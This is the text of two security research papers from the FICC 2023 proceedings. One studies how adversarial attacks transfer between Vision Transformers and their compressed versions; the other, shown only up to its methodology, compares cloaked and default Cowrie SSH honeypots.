Abstract. Vision Transformers are increasingly embedded in industrial systems due to their superior performance, but their memory and power requirements make deploying them to edge devices a challenging task. Hence, model compression techniques are now widely used to deploy models on edge devices as they decrease the resource requirements and make model inference very fast and efficient. But their reliability and robustness from a security perspective are major issues in safety-critical applications. Adversarial attacks are like optical illusions for ML algorithms and they can severely impact the accuracy and reliability of models. In this work, we investigate the performance of adversarial attacks across the Vision Transformer model compressed using 3 SOTA compression techniques. We also analyze the effect different compression techniques like Quantization, Pruning, and Weight Multiplexing have on the transferability of adversarial attacks. Keywords: Adversarial attacks · Vision transformers · Model compression · Universal adversarial perturbations · Quantization Pruning · Knowledge distillation
1
·
Introduction
Industrial systems require highly optimized algorithms which have less latency for real-time deployment. Such algorithms are neural network models that are massive in size and require high computation power. Hence deploying these models on edge devices becomes a challenging task [19]. ViTs are computationally expensive models with a large memory footprint so they have huge training times for massive datasets. Model compression techniques such as quantization and pruning are now widely used to deploy such models on edge devices as they decrease the resource requirements and make model inference fast and efficient. Additionally, knowledge distillation is being used to improve model performance and memory footprints [2]. More recently, ViTs have been attacked by several white boxes and blackbox attacks [3]. These adversarial attacks are like optical illusions for machines, where such samples can severely impact the accuracy and reliability of models. Hence from a security perspective, their reliability and robustness are major issues in safety-critical applications. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 743–758, 2023. https://doi.org/10.1007/978-3-031-28073-3_50
744
S. Parekh et al.
1.1
Related Work
Attacks on Vision Transformers: Several attacks have been proposed for challenging the security of Vision Transformers. One of the recent attack frameworks proposed by Fu et al. [7] is called Patch-Fool that adversarially modifies certain patches in the images to fool the ViTs. Subramanya et al. [15] was the first to discover vulnerabilities using backdoor attacks on ViTs and check their susceptibility. The attack is used to poison a portion of the test images which can be used to manipulate the model’s decision by triggering these images at test time. The most comprehensive study of white and black box attacks on ViTs was performed by Benz et al. ([3]) where they compare ViT robustness to CNNs and MLP-Mixer models. Compressing Vision Transformer: Several compression techniques have been proposed to deal with the massive memory and computational overhead of these models. Notable work includes post-training Quantization of ViT weights [10], weight pruning of ViTs [12,18] and weight multiplexing and distillation to compress ViTs while maintaining the accuracy [20]. 1.2
Novel Contribution
With the recent popularity of ViT-based architectures as alternatives to CNNs, it is vital for the community to understand their adversarial robustness and their compressed versions. This paper is the first work as per our knowledge to attack various compression techniques applied ViTs and measure their performance. We investigate the transferability of adversarial samples across the SOTA ViT model and its compressed versions to infer the effects different compression techniques have on adversarial attacks. We were inspired by Yiren Zhao et al. [21] which performs an exhaustive study of white and black box attacks on CNNs and replicates them for ViTs and their SOTA compressed variants. In the rest of the paper, we introduce the compression techniques and the different types of attacks that we perform on these compressed VITs models. Further along, in Sect. 7 we depict the results using graphs to show the effects of every attack on a particular type of model compression compared with the original. We make interesting observations around Quantized ViTs’ vulnerability towards Black Box attacks, the effect of pruning sparsity on ViT resilience against Universal Perturbations, and attack transferability across various compression techniques. We show that these attacks remain highly transferable across original and compressed version and can cause millions in damages if exploited.
2
Dataset
The ImageNet [5] dataset contains 14,197,122 WordNet-annotated images. The dataset has been used in the ImageNet Large Scale Visual Recognition Challenge
Attacking Compressed Vision Transformers
745
(ILSVRC), an image classification and object identification benchmark, since 2010. A set of manually annotated training photos is included in the publicly available dataset. A series of test photos are also available, although without the manual comments. There are two types of ILSVRC annotations: (1) imagelevel annotations that include a binary label for the presence or absence of an object class in the image, such as “there are cars in this image” but “there are no tigers,” and (2) object-level annotations that include a tight bounding box and class label around an object instance in the image. We use the image classification type dataset, described as follows: – Images from 1000 different classes are included in the dataset. – It is divided into three sections: training (1.3 million images), validation (50,000 images), and testing (10,000 images) (100K images with held-out class labels). – There are around 14M photos in total.
3
Metrics
We use 3 metrics to quantify our attacks performance and model compression performance: 1. ASR(Attack Success Rate) - This metric tracks how many attacks on a dataset were successful in making the model misclassify. 2. FLOPs and Throughput(Images/s) are used to benchmark compressed model performance. 3. Model size (in MBs) is used to measure compressed model memory reduction.
4 4.1
Vision Transformers and Types Transformers
Vision Transformers are based on Transformers [17] which is an attention-based sequence transduction neural network model that learns context and meaning by tracking relationships in sequential text data. The attention mechanism allows the model to make predictions by analyzing the entire input but selectively attending to some parts. Transformers apply this mechanism using an encoder-decode structure. Unlike Recurrent Neural networks (LSTMs for example), Transformers read all the words in the text as input thus parallelizing the process. This makes Transformers easily trainable on a large corpus. 4.2
Vision Transformers
While the Transformer architecture has emerged as the de facto standard for natural language processing tasks, its applications to computer vision remain
746
S. Parekh et al.
limited. Attention is used in vision either in conjunction with convolutional networks or to replace specific components of convolutional networks while maintaining their overall structure. [6]] demonstrates that relying on CNNs is not required and that a pure transformer applied directly to sequences of image patches can perform very well on image classification tasks. Vision Transformer (ViT) achieves excellent results compared to state-of-the-art convolutional networks when pre-trained on large amounts of data and transferred to multiple mid-sized or small image recognition benchmarks (ImageNet, CIFAR-100, VTAB, etc.). 4.3
Data-Efficient Image Transformers (DeiT)
DeiT presents a transformer-specific teacher-student strategy [16]. It is based on a distillation token to ensure that the student learns from the teacher through attention. This token-based distillation is gaining popularity, especially when using a convnet as a teacher. The results are competitive with convnet for both Imagenet (85.2% accuracy achieved) and transferring to other tasks. The first essential component of DeiT is its training strategy. Initially, the authors used data augmentation, optimization, and regularization to simulate CNN training on a much larger data set. They also altered the Transformer architecture to allow for native distillation. (Distillation is the process by which one neural network (the student Neural Network) learns from the output of another (the teacher Neural Network). As a teacher model for the Transformer, a CNN is used. The use of distillation may impair neural network performance. As a result, the student model learns from two sources that may diverge: a labeled data set (strong supervision) and the teacher. To address this, a distillation token is introduced - a learned vector that flows through the network with the transformed image data, cueing the model for its distillation output, which can differ from its (distillation token’s) class output. This enhanced distillation method is unique to Transformers.
5
Attacks
Depending on the accessibility to the target model, adversarial attacks can be divided into white-box ones that require full access to the target model and query-based black-box attacks. Adversarial attacks can be divided into imagedependent ones and universal ones. Specifically, contrary to image-dependent attacks, a single perturbation, i.e. universal adversarial perturbation (UAP) exists to fool the model for most images. 5.1
White Box Attacks
In White Box attack [3], the adversary has full access and knowledge of the model, that is, the architecture of the model, its parameters, gradients, and loss with respect to the input as well as possible defense mechanisms known to the
Attacking Compressed Vision Transformers
747
attacker. It is thus not particularly difficult to attack models under this condition and the common methods to exploit the model’s output gradient to generate adversarial examples are FGSM: Fast Gradient Sign Method, FGM: Fast Gradient Method, I-FGSM: Iterative version of FGSM, MI-FGSM: Momentum Iterative Gradient-Based, PGD: Projected Gradient Descend, and DeepFool: Iterative algorithm. We use Universal Adversarial Perturbations (UAP) to attack our models. Universal Adversarial Perturbations (UAP): UAP’s goal is to identify a single little picture modification that deceives a state-of-the-art deep neural network classifier on all-natural images. Seyed-Mohsen Moosavi-Dezfooli et al. [11] demonstrates the presence of such quasi-imperceptible universal perturbation vectors that lead to the high probability of miss-classifying pictures. The label estimated by the deep neural network is modified with high probability by introducing such a quasi-imperceptible perturbation to natural pictures. Because they are picture agnostic and work on any inputs, such perturbations are named universal. Additionally recent work has shown that generating these triggers do not require access to any training data [14]. An example of UAPs is shown in Fig. 3. The authors propose the following method for estimating such perturbations - µ denotes a distribution of images in Rd , and kˆ defines a classification function that outputs for each image x ∈ Rd ˆ an estimated label k(x). The main focus of their paper is to seek perturbation d vectors v ∈ R that fool the classifier kˆ on almost all data points sampled from ˆ + v) = k(x) ˆ µ. They seek a vector v such that: k(x for “most” x ∼ µ. 5.2
Black Box Attacks
In contrast to white-box attacks, a black-box attack [4] has limited knowledge of the model. Querying the model on inputs and viewing the labels or confidence scores is a common paradigm for an attack with black-box limitations. While black-box assaults restrict the attacker’s capabilities, they are more realistic in real-world scenarios. Security assaults are often carried out on fully developed and deployed systems. In the actual world, attacks with the goal of circumventing, disabling, or compromising integrity are common. This paradigm allows for the consideration of two parties: adversary and challenger. The challenger is the party that trains and installs a model, whereas the adversary is the party that attempts to break the system for a predetermined aim. This option allows for a variety of capability settings that mimic real-world behavior. Some examples of black-box attacks are Query Reduction using Finite Differences, Translation-Invariant, Spatial Attack, L2 Contrast Reduction Attack, Salt And Pepper Noise Attack, and Linear Search Blended Uniform Noise Attack. We illustrate the attacks used in our work. Spatial Attack: One important criterion for adversarial examples is that the perturbed images should “look similar to” the original instances. All the existing
748
S. Parekh et al.
approaches directly modify pixel values, which may sometimes produce noticeable artifacts. Instead, Spatial Attack [13] aims to smoothly change the geometry of the scene while keeping the original appearance, producing more perceptually realistic adversarial examples. In this attack, the idea is to use rotations and translations in an adversarial manner. The attack used the following hyperparameters: do-rotations (If False no rotations will be applied to the image), do-translations (If False no translations will be applied to the image).
Fig. 1. Salt and pepper noise effects.
Salt and Pepper Noise Attack: Salt-and-pepper noise, also known as impulse noise, is a form of noise sometimes seen on digital images. This noise can be caused by sharp and sudden disturbances in the image signal. It presents itself as sparsely occurring white and black pixels. The results of adding this kind of noise can be observed in Fig. 1. An effective noise reduction method for this type of noise is a median filter or a morphological filter. This adversarial attack [13] aims to increase the amount of salt and pepper noise until the input is misclassified. The attack used the following hyperparameters: steps (The number of steps to run). Linear Search Blended Uniform Noise Attack: Linear Search Blended Uniform Noise Attack [13] aims to blend the input with a uniform noise input until it is misclassified.
Attacking Compressed Vision Transformers
Fig. 2. Pruning example for imagenet.
Fig. 3. UAP example.
749
750
S. Parekh et al.
The attack used the following hyperparameters: distance (Distance measure for which minimal adversarial examples are searched), directions (Number of random directions in which the perturbation is searched), steps (Number of blending steps between the original image and the random directions).
6 6.1
Compression Techniques Dynamic Quantization
When developing neural networks, there are several trade-offs to consider. A recurrent neural network’s number of layers and parameters can be changed during model building and training, allowing you to trade off accuracy with model size and/or model latency or throughput. Because we are iterating over the model training, such adjustments might take a long time and a lot of computing resources. After training, quantization [1] can be used to make a similar trade-off between performance and model correctness using a known model. Quantizing a network entails transforming the weights and/or activations to a lower-precision integer representation. This reduces model size and allows your CPU or GPU to do higher-throughput arithmetic operations. Converting from floating-point to integer numbers entails multiplying the floating-point value by a scaling factor and rounding the result to the nearest whole number. The various quantization methods take different techniques to obtain that scale factor. Because dynamic quantization has few adjustment options, it is ideally suited for inclusion in production pipelines as a normal element of converting models to deployment. Model parameters, on the other hand, are known during model conversion and have been transformed and saved in INT8 format ahead of time. The quantized model uses vectorized INT8 instructions for arithmetic. To avoid overflow, accumulation is usually done with INT16 or INT32. If the following layer is quantized or converted to FP32 for output, the higher precision number is scaled back to INT8. 6.2
Pruning: Dynamic DeiT
In ViTs, attention is scarce and the final prediction is only based on a subset of the most informative tokens, which is sufficient for accurate image recognition. Based on this observation, the authors propose a dynamic token sparsification framework for progressively and dynamically pruning redundant tokens based on the input [12]. A lightweight prediction module estimates the importance score of each token based on the current features. This module is added to different layers to prune redundant tokens hierarchically. The authors propose an attention masking strategy to differentiably prune a token by blocking its interactions with other tokens to optimize the prediction module from start to finish. Because of the nature of self-attention, unstructured sparse tokens are still hardware friendly, making it easy for this framework to achieve actual speed-up.
Attacking Compressed Vision Transformers
751
By pruning 66% of the input tokens hierarchically, it significantly reduces 31% to 37% FLOPs and improves throughput by more than 40% while maintaining accuracy within 0.5% for various vision transformers. An example is displayed here Fig. 2 DynamicDeiT [12] models, when equipped with the dynamic token sparsification framework, can achieve very competitive complexity/accuracy trade-offs when compared to state-of-the-art CNNs and vision transformers on ImageNet. We trained three dynamic DeiT models pruned at 3 different pruning probabilities - 0.5, 0.6, and 0.7. 6.3
Weight Multiplexing + Distillation: Mini-DeiT
ViT models contain a large set of parameters, restricting their applicability on low-memory devices. To alleviate this problem, the authors propose Mini-DeiT [20], a new compression framework, which achieves parameter reduction in vision transformers while retaining the same performance. The central idea of Mini-DeiT is to multiplex the weights of consecutive transformer blocks. More specifically, the authors make the weights shared across layers while imposing a transformation on the weights to increase diversity. Weight distillation over self-attention is also applied to transfer knowledge from largescale ViT models to weight-multiplexed compact models. Weight Multiplexing: [20] combines multi-layer weights into a single weight over a shared part while involving transformation and distillation to increase parameter diversity. More concretely, as shown in Fig. 5, the weight multiplexing method consists of sharing weights across multiple transformer blocks, which can be considered as a combination process in multiplexing; introducing transformations in each layer to mimic demultiplexing; and applying knowledge distillation to increase the similarity of feature representations between the models before and after compression. Weight Distillation: To compress the large pre-trained models and address the performance degradation issues induced by weight sharing, weight distillation [20] is used, to transfer knowledge from the large models to the small and compact models. Three types of distillation for transformer blocks, i.e., prediction-logit distillation [8], self-attention distillation [9], and hidden-state distillation.
7
Experiments and Results
Our experiments work by creating attacks in 2 ways: 1. Create attacks on the original model and test them on a compressed model.
752
S. Parekh et al.
Fig. 4. Accuracies of various architectures we used on the ImageNet validation.
2. Create attacks on the compressed model and test them on the original model. Figure 4 shows the accuracies of our 4 model families on the Imagenet Validation set. The four families are pruned-deit, original deit, distilled deit and mini deit(which performs weight multiplexing + distillation). We make the following observations: 1. Pruning models: As the keep-rate of pruning increases and sparsity decreases the accuracy increases, and approaches the original deit small 2. Quantized models have slightly lower accuracy compared to the deit-small 3. Tiny < Small < Base accuracy for original, distilled and mini-deit 7.1
Compression Results
As mentioned in Sects. 6.1, 6.2, 6.3 we use quantization, pruning, distillation(born again networks) and weight multiplexing+distillation to compress our models. The model size trend chart is shown in Table 1 for the various distilled and quantized models. We can observe that born-again networks are slightly bigger than the original model, while the mini-deit size is proportional to the size of the original with a marginal drop in accuracy according to Fig. 4. For the
Attacking Compressed Vision Transformers
753
Fig. 5. Weight multiplexing method.
base model in particular mini-deit compresses deit-b from 86M to 9M(9.7×). Quantization gives the biggest model size reduction, but by doing this we lose access to gradients, forcing us to rely on less-effective black-box attacks discussed in Sect. 7.2. In the case of the Pruning models, Table 2 shows how the FLOPS and Throughput vary as the keep-probability decreases and sparsity increases. While pruning doesn’t decrease the model size, it improves throughput and FLOPS which help in faster inference. Table 1. Model weight size for distillation + quantization Main Distilled Mini-deit 8bit Quantization Tiny
22M
23M
12M
Small 85M
86M
44M
23M
169M
89M
Base
7.2
331M 334M
6.4M
Quantization Attack Results
Quantized models do not have the ability “pass gradients” through them in PyTorch. Hence we cannot use white box attacks on them, since they require access to model weights and gradients. We use the 3 black box attacks discussed in Sect 5.2 and their ASR are reported in Fig. 6. Key Takeaways: 1. ViTs are secure against Spatial Attacks. 2. Quantized models are more vulnerable to attacks compared to the original model.
754
S. Parekh et al.
3. Attacks from Quantized models transferred to the original model work better than vice-versa. We hypothesize this is due to the fact that 8-bit quantization is more robust creating stronger attacks that work on the original model (which is still in the same feature space). Table 2. Model compression performance for pruning models(DynamicDEiT) with different keep probability Metric
Main (1.0) pruned 0.7 pruned 0.6 pruned 0.5
GFLOPS
4.6
Throughput(img/s) 1337.7
2.9
2.4
1.9
2062.1
2274.09
2526.93
Fig. 6. Results on attacking quantized models: the scores in each cell are the ASR of spatial attack— salt and pepper attack— linear search blended uniform noise attack
7.3
Pruning Attack Results
We train three models with varying sparsity and pruning ratios, and transfer white box attacks to the original model, resulting in Fig. 7. Key Takeaways: 1. Pruned models are more sensitive to attacks than the original model. 2. The attacks remain highly transferable from the main to pruned models, where the transferability decreases as the pruning probability decreases. This is because increasing sparsity distorts the model structure and the attacks don’t transfer as well.
Attacking Compressed Vision Transformers
755
Fig. 7. Pruning results.
7.4
Weight Multiplexing + Distillation Attack Results
We use two types of distillation to see the effect that each individual components have on the attacks and their transferability for the 3 model variants, tiny, small, and base. Key takeaways according to Fig. 8, 9, 10:
Fig. 8. Base distillation results.
756
S. Parekh et al.
Fig. 9. Tiny distillation results.
Fig. 10. Small distillation results.
Attacking Compressed Vision Transformers
757
1. The weight multiplexed models are more robust to attacks compared to the distilled and original models in all variants. 2. Attacks transfer very well between the original to both distilled models, probably because the distilled models are highly dependent on the teacher’s(original model) probabilities which are used to compute the attacks in the black box setting. 3. Base models are more robust than the Tiny and Small models variants. 4. Attacks from the weight multiplexed models work better than purely distilled models on the original model, which likely results from its robustness to attacks which creates stronger attacks.
8
Limitations and Future Work
Since our aim is to test the underlying transformer architecture and how its robustness changes when compressed, we only test the adversarial robustness of vanilla vision transformer models like DeIT trained on the ImageNet dataset. We do not apply any robustness-improving training techniques such as data augmentation, early stopping, or adversarial retraining to the modeling process. We leave this analysis to future work. Additional future research directions could be interpreting the predictions from the various compressed models and identifying why some compressed models are more vulnerable to attacks using interpretability tools such as Integrated Gradients. Ultimately we as researchers should aim to develop effective compression techniques which reduce the model size and also provide robust models to allow widespread deployment of ViTs.
9
Conclusion
In this work, we train various ViTs and apply state-of-the-art compression techniques to them to evaluate their robustness under an adversarial setting. We discover several interesting facts such as high pruning sparsity reduces the effectiveness of adversarial attacks; compressed models, especially quantized attacks are more vulnerable to black-box attacks and weight multiplexed models are more robust to attacks compared to the others. Additionally, we provide an experimentation framework to apply various compression techniques and adversarial attacks on various ViT architectures which is easily extensible to new compression techniques and ViT-variants. Ultimately, while compressed models may provide performance benefits, they do not provide much in way of security. The attacks created on a compressed model deployed onto an edge device can be translated to other underlying models and can wreak havoc and cost companies millions if not dealt with promptly. Our code is available here: https://github.com/SwapnilDreams100/Attacking Compressed ViTs
758
S. Parekh et al.
Acknowledgments. We would like to thank Prof. Siddharth Garg at NYU Tandon School of Engineering for his advice and support for this paper. This work was supported in part through the NYU IT High-Performance Computing resources, services, and staff expertise.
References 1. Dynamic quantization 2. Knowledge distillation on cifar10 3. Benz, P., Ham, S., Zhang, C., Karjauv, A., Kweon, I.S.: Adversarial robustness comparison of vision transformer and mlp-mixer to cnns. CoRR, abs/2110.02797 (2021) 4. Bhambri, S., Muku, S., Tulasi, A., Buduru, A.B.: A study of black box adversarial attacks in computer vision. CoRR, abs/1912.01667 (2019) 5. Deng, J., Dong, W., Socher, R., Li, L.J., Li, K., Fei-Fei, L.: Imagenet: a large-scale hierarchical image database. In: 2009 IEEE Conference on Computer Vision and Pattern Recognition, pp. 248–255 (2009) 6. Dosovitskiy, A., et al.: An image is worth 16×16 words: transformers for image recognition at scale. CoRR, abs/2010.11929 (2020) 7. Fu, Y., Zhang, S., Wu, S., Wan, C., Lin, Y.: Patch-fool: are vision transformers always robust against adversarial perturbations? (2022) 8. Hinton, G., Vinyals, O., Dean, J.: Distilling the knowledge in a neural network (2015) 9. Jiao, X., et al.: Tinybert: distilling BERT for natural language understanding. CoRR, abs/1909.10351 (2019) 10. Liu, Z., Wang., Y., Han, K., Ma, S., Gao, W.: Post-training quantization for vision transformer (2021) 11. Moosavi-Dezfooli, S.M., Fawzi, A., Fawzi, O., Frossard, P.: Universal adversarial perturbations. CoRR, abs/1610.08401 (2016) 12. Rao, Y., Zhao, W., Liu, B., Lu, J., Zhou, J., Hsieh, C.J.: Dynamicvit: efficient vision transformers with dynamic token sparsification. CoRR, abs/2106.02034 (2021) 13. Rauber, J., Brendel, W., Bethge, M.: Foolbox v0.8.0: a python toolbox to benchmark the robustness of machine learning models. CoRR, abs/1707.04131 (2017) 14. Singla, Y.K., Parekh, S., Singh, S., Chen, C., Krishnamurthy, B., Shah, R.R.: Minimal: mining models for universal adversarial triggers. In: Proceedings of the AAAI Conference on Artificial Intelligence, vol. 36, no. 10, pp. 11330–11339 (2022) 15. Sotudeh, S., Goharian, N.: Tstr: too short to represent, summarize with details! intro-guided extended summary generation (2022) 16. Touvron, H., Cord, M., Douze, M., Massa, F., Sablayrolles, A., J´egou, H.: Training data-efficient image transformers and distillation through attention (2020) 17. Vaswani, A., et al.: Attention is all you need. CoRR, abs/1706.03762 (2017) 18. Fang, Y., Huang, K., Wang, M., Cheng, Y., Chu, W., Cui, L.: Width and depth pruning for vision transformers. In: Proceedings of the AAAI Conference on Artificial Intelligence, vol. 36, no. 3, pp. 3143–3151 (2022) 19. Zhai, X., Kolesnikov, A., Houlsby, N., Beyer, L.: Scaling vision transformers. CoRR, abs/2106.04560 (2021) 20. Zhang, J., et al.: Compressing vision transformers with weight multiplexing. Minivit (2022) 21. Zhao, Y., Shumailov, I., Mullins, R.D., Anderson, R.: To compress or not to compress: understanding the interactions between adversarial attacks and neural network compression. CoRR, abs/1810.00208 (2018)
Analysis of SSH Honeypot Effectiveness Connor Hetzler, Zachary Chen, and Tahir M. Khan(B) Purdue University, West Lafayette, IN, USA [email protected]
Abstract. The number of cyberattacks has increased in the twenty-first century, with the FBI receiving 791,790 individual internet crime complaints in the United States in 2020. As attackers become more sophisticated with their ransomware and malware campaigns, there is a significant need for security researchers to assist the greater community by running vulnerable honeypot machines to collect malicious software. The ability to collect meaningful malware from attackers depends on how the attackers receive the honeypot. Most attackers fingerprint targets before they launch their attack, so it would be very beneficial for security researchers to understand how to hide honeypots from fingerprinting and trick the attackers into depositing malware. This study investigated the use of a cloaked and uncloaked SSH honeypot to learn how attackers fingerprint SSH honeypots and the efficacy of cloaking the honeypot by changing features that attackers fingerprint. This paper compares the number of logins and commands run by the attackers captured on default and cloaked Cowrie honeypots. The project lasted just over a month, and the cloaked honeypot received 74.5% of the total login attempts and 53% of the commands executed on the honeypot systems, as it was more believable than the uncloaked. This paper reports that modifying SSH honeypot systems improves malware collection effectiveness. This project focuses on monitoring attacker tactics on a standard SSH honeypot to understand their fingerprinting commands, integrate those that are missing into the cloaked honeypot, as well as adding/modifying files with which the attackers interact. The attackers utilized a variety of UNIX commands and files on the honeypots. The attackers who successfully logged into the SSH honeypot downloaded malware, including IRC bots, Mirai, Xmrig cryptominers, and many others. What is certain is that if a cautious attacker believes they are in a honeypot, they will leave without depositing malware onto the system, which reduces the effectiveness of the honeypot for security research. Keywords: SSH honeypot · Cowrie · Linux honeypot · Malware forensics · Attacker tactics · Honeypot Effectiveness
1 Introduction Understanding how attackers target machines and how to mitigate such attacks is a critical component of information security and data protection. With the rapid rise and transition to online working environments, the Internet has become a vital part of our daily lives. It has made it easier for attackers to deliver malware, ransomware, and other © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 759–782, 2023. https://doi.org/10.1007/978-3-031-28073-3_51
760
C. Hetzler et al.
threats. According to researchers at the University of Maryland, a hacker attack occurs every 39 s on average in the United States [12]. Over 1 in 3 Americans have reported having their private computer breached and information stolen [13]. Even with such a widespread problem, there is no readily available information for the general public to understand common attack methods, mitigation techniques, and basic computer security. Many people are not technologically savvy and either do not understand the issue, ignore it completely, or rely on a third party to provide security. The inspiration for the name honeypot refers to trappers placing honey-filled containers to lure bears. When used in the information technology (IT) industry, they are simply passive systems that lure attackers and log their every action. As a decoy system, it will have flaws to attract an attacker, but they should be subtle enough not to raise suspicion. The honeypot system used in this study is called Cowrie, developed by Michael Oosterhoff [8] as a mediumlevel interactive SSH and Telnet honeypot that records brute-force attacks and commands from their shell interaction after being authenticated [3], however we will only be using it for SSH, not Telnet. It is popular for its ease of use, open-source, and ability to monitor attacks. The first phase of the research involved monitoring the commands and files accessed on a default Cowrie honeypot in order to create a list of files and commands to be changed on the cloaked Cowrie honeypot to hide the honeypot aspect better and provide the attacker with a more authentic looking target server to increase the number of malicious attacks and malware launched against the server. The second phase consisted of applying the learnings of attacker fingerprinting in phase 1 into the cloaked honeypot to make it more realistic. Organizations and security researchers can take the two-phase research conducted in this paper and apply it to honeypots in their control to improve the resistance to fingerprinting. This research will be helpful to the security community because it offers insight and building blocks for those running SSH honeypots. Researchers who want to increase their fingerprinting resistance or increase the malicious traffic to their honeypots can use the files and commands identified in Tables 1, 2, 3, and 4 to customize their Cowrie honeypot. Two honeypot SSH servers were set up: one was a default Cowrie SSH honeypot which was downloaded from GitHub without modification [8], and the other was intended to be harder to fingerprint as a honeypot, called the Cowrie “cloaked” version, which was created by removing default values [9], adding commands and modifying files from the default version. The metrics that attackers look for in a honeypot were collected prior to the project by running the default Cowrie version and monitoring any commands, files, or implementing other features that were attempted to be accessed by an attacker and are expected to be included in a typical Linux server. All information that was generated on the honeypots was automatically logged in Splunk. The project team hypothesized that the cloaked honeypot would generate more interest and receive the most diverse number of attacks and malware installed due to it being the least similar to a standard honeypot. The content covered in this paper could be generalized to examine the effectiveness of any type of research honeypot, especially in cases where researchers want to use honeypots to discover new types of ransomware and zero-day exploits since attackers who deploy these types of new malware are more cautious of honeypots when deploying and need more realistic machines.
Analysis of SSH Honeypot Effectiveness
761
The paper is organized as follows: Sect. 2 covers related research in the field of SSH honeypots. Section 3 discusses the methodology and steps to replicate the research conducted. Section 4 covers the data and results of our research study, which are broken down into results from the uncloaked default honeypot and the cloaked honeypot. Section 5 compares the data collected on the uncloaked and cloaked honeypots. Lastly, Sect. 6 concludes the research conducted and the data collected.
2 Background Understanding how attackers target machines and what characteristics of a machine make an attacker more likely to install malware is a critical component of information security research. Since the early 2000s, many articles have covered how to extract meaningful threat intelligence from large amounts of honeypot logs, and many have researched the visualization of honeypot data for threat intelligence. Articles from Phrack magazine from 2004 [5] and [6] discussed how honeypots could be identified and vulnerabilities exploited to give attackers more power to identify honeypots in the wild, demonstrating the need for security researchers to identify and upgrade aspects of honeypots that allow for fingerprinting. Baser et al. [1] discuss visualizing honeypot logs to generate actionable threat intelligence, but they do not discuss improving or modifying the honeypot to make it more difficult to fingerprint. Their research covered the use of Cowrie SSH and Telnet honeypots with the goal of creating visualizations. Previous research conducted by AlMohannadi et al. [2] and Koniaris et al. [4] focused on the post-compromise actions and motives of attackers using SSH attacks on honeypots and how to conduct proper analysis so organizations can make better security decisions. Koniaris et al. [4] discussed the impact of attackers fingerprinting honeypots but did not specify what should be changed in the honeypot. The malware downloaded by the attackers in the [2] study was notable because it was similar to the malware installed in our projects, such as IRC Command and Control and cryptominers. Dornseif et al. [7] discuss how attackers can determine honeypots by looking at inconsistencies in byte counts for network interfaces and timing attacks. However, these are applied to older honeypot software different from the honeypot used in this study, Cowrie. Dornseif et al. [7] also mention the downside of publishing research on honeypots, it allows for the blackhats, the evil hackers, to gain insight into what the security researchers are working on, which would allow for the blackhats to study our works and devise methods to circumvent them. Some articles have previously discussed how to improve Cowrie honeypot. Dahbul et al. [11] advise modifying the ping command to ensure it will only ping valid addresses. The problem with older versions of Cowrie was that they would allow you to ping addresses that did not exist, such as 999.999.999.999, which was an easy indicator to an attacker that they are in a honeypot. Dahbul et al. [11] discuss how to improve other types of honeypots to reduce the ability to fingerprint. Another previous research conducted by McCaughey et al. [10] investigated how changing the authentication database for Cowrie would impact the volume of attacks. They used a 4-stage study which consisted of modifying their password database to be progressively more accessible to brute force as the stages moved on. McCaughey et al. [10] suggest that attackers check for the existence of normal UNIX commands, and the absence of a command, which is common in honeypots as
762
C. Hetzler et al.
they do not exactly replicate a real machine, can be an indicator of a honeypot, but they do not discuss how to modify or increase the honeypot’s effectiveness. This research paper differs from others that discuss honeypot fingerprinting in that we investigate the impact of changing the custom fingerprint reduced honeypot as compared to the default honeypot, allowing us to study the effectiveness of the customization and provide evidence that the cloaking was able to increase the attacker volume, rather than simply suggesting ways to improve the effectiveness. With so many research papers on SSH honeypots, there are few articles on how to reduce the effectiveness of fingerprinting. One reason for the lack of public research was made clear in the review of previous research [5] and [6], which suggested that publicly publishing information regarding how to secure honeypots gives advantages to attackers. The absence of modern research covering the methods to hide honeypots may result from the need for secrecy on the topic. However, we feel there is value in sharing our findings to help other security researchers. We also understand that attackers may read this article as well. Therefore, we chose not to go into detail about exactly what was changed in a file or command to make it harder to fingerprint, instead, we will only indicate that the file or command was changed from the default Cowrie honeypot.
3 Methodology While many different types of systems are under constant threat of being attacked, the SSH server receives some of the most attack attempts of any other protocol, which is why we decided to focus on SSH honeypots for our project. The purpose of using a Cowrie honeypot rather than a real system to conduct malware research is to mislead the attacker into believing they have accessed an insecure business SSH server while not allowing the attacker to truly cause any harm/damage. Cowrie allows attackers to connect to the honeypot and execute predefined Linux commands. It does not allow them to execute any downloaded programs but captures the downloaded malware for later analysis. All the commands and information created by cowrie are exported to a separate Splunk server for record-keeping and data analysis off of the honeypot. All systems utilized for this project are hosted in the Amazon Web Services (AWS) us-east2 region. These systems were created from a template Amazon Machine Image (AMI) created by following Center for Internet Security (CIS) level 1 recommendations for ubuntu 20.04 machines and creating an AMI from that machine. The purpose of following the CIS recommendations is to harden the systems because we only want attackers getting into the cowrie honeypots and not into the true host machine. The AMI template also allows for easy replication of and deployment of the necessary systems, as depicted in Fig. 1, such as a Splunk server for reporting and logging and the two cowrie honeypots for the project. The research project used three servers on AWS. The first was Splunk enterprise, which used the CIS level 1 Ubuntu AMI, accepted remote logs on port TCP 5140, and stored them on disk for later analysis and visualization. The next was cowrie unmodified, made from the CIS level 1 Ubuntu AMI, and included a default installation of Cowrie SSH honeypot configured to listen for SSH on port TCP 22. The last machine was cowrie cloaked made from the CIS level 1 Ubuntu AMI and included a modified installation of Cowrie SSH honeypot to make it more fingerprint-resistant, the
Analysis of SSH Honeypot Effectiveness
763
process discussed in depth below, and also accepted SSH connections on port TCP 22. The research project was executed in two phases. The first phase only used the default cowrie honeypot. It established the files and commands included in default Cowrie, which needed some change to be more similar to UNIX commands and files, those that were identified were used to create the Cloaked honeypot, which was used in phase 2 of the research. Phase two consisted of running the cloaked and default Cowrie honeypots at the same time to study which machine received more traffic and commands. Figure 1 depicts the architecture for the research:
Fig. 1. AWS topology diagram
